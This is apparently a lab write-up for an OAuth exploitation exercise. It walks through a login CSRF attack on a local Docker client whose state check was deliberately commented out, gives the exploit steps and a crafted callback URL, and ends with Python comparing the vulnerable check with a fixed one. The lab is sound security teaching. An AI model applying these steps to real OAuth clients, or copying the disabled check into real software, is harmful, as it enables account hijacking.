Exercise 1

This exercise exploits an OAuth client that does not properly check the state parameter (it verifies that the state exists but not that it belongs to the current user's session). The goal is to tie the attacker's resource to the victim's account by persuading the victim to click on a link.

Setup

$ git clone https://github.com/melonattacker/oauth-exploit-lab.git
$ cd oauth-exploit-lab/exercise/ex1
$ docker-compose up -d

URL

target   URL
client   http://localhost:10000
crawler  http://localhost:10003

Account

username        password
bob (attacker)  hoge
tom (victim)    huga

Writeup

You can see that the client only checks whether the state parameter exists; the user integrity check that ties the state to the logged-in session is commented out.

    # check state and session
    State = Query()
    res = db.search(State.state == request.args.get('state'))
    if len(res) == 0:
        return render_template('error.html', error='State value did not match')
    # The check that ties the stored state to the logged-in user is disabled,
    # so any state the server ever issued is accepted in any user's session:
    # if res[0]['user'] != session.get('name'):
    #     return render_template('error.html', error='State value did not match')

This makes the callback vulnerable to CSRF (login CSRF). To exploit it, the attacker goes through the authorization process under his own account, pauses immediately after authorization, and then sends the resulting callback URL to the logged-in victim.

First, go through the authorization process as the attacker and create a URL containing the authorization code and state. You can use exploit/create_url.py to do that.

$ python3 exploit/create_url.py
Fishing URL: http://localhost:10000/callback?code=XCXV9OXN&state=8QKHH8XMYY08ZB9ZQXNHZJ10NSV50GI6

Then have the crawler (http://localhost:10003) visit the created URL. Because the crawler runs inside the Docker network, you need to change the hostname in the URL from localhost to client, e.g. http://localhost:10000/callback?code=CZI9SLH2&state=ZEM0WA9E1YXYY3LFVQC06L43SRDYDOZV => http://client:10000/callback?code=CZI9SLH2&state=ZEM0WA9E1YXYY3LFVQC06L43SRDYDOZV

When it's done, you'll see a response like this:

The attacker's resource was tied to the victim's client account.

Please visit below link as victim(tom).

http://localhost:10000/fetch_resource?access_token=SWUO9XS63NDI3W9CKQ3594SS845AMVMKJ5D44YPO1ORGI2E7ZKT2H6IOG35509M9

If you visit the given link as the victim (tom), you can see that the account is now pointing to the attacker (bob)'s resource.
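To show why the commented-out line matters, here is an added stand-alone Python model (not the lab's own code) of the callback check before and after binding the state to the session user; the in-memory list stands in for the lab's TinyDB state table, and the consume-on-use step is an assumed hardening beyond what the lab shows.

```python
import secrets

# Constructed stand-in for the lab's state table: one record per issued state,
# recording which logged-in user started the authorization flow (assumption).
issued_states = []


def issue_state(user):
    """Client starts the authorization flow for `user` and records the state."""
    state = secrets.token_hex(16)
    issued_states.append({'state': state, 'user': user})
    return state


def callback_vulnerable(session_user, state):
    """Mirrors the lab's check: the state must exist, but is not tied to the
    session, so a state issued for the attacker passes in the victim's session."""
    res = [r for r in issued_states if r['state'] == state]
    if not res:
        return 'State value did not match'
    return 'OK'


def callback_fixed(session_user, state):
    """Hardened check: the state must exist AND belong to the logged-in user.
    The record is removed once used so the callback URL cannot be replayed."""
    res = [r for r in issued_states if r['state'] == state]
    if not res or res[0]['user'] != session_user:
        return 'State value did not match'
    issued_states.remove(res[0])  # single use
    return 'OK'


def demo():
    """bob (attacker) starts the flow and pauses; tom (victim) opens the URL."""
    issued_states.clear()
    attacker_state = issue_state('bob')
    return {
        'vulnerable': callback_vulnerable('tom', attacker_state),   # accepted
        'fixed': callback_fixed('tom', attacker_state),             # rejected
        'fixed_legit': callback_fixed('bob', attacker_state),       # bob's own
        'fixed_replay': callback_fixed('bob', attacker_state),      # consumed
    }


if __name__ == '__main__':
    for name, result in demo().items():
        print(f'{name}: {result}')
```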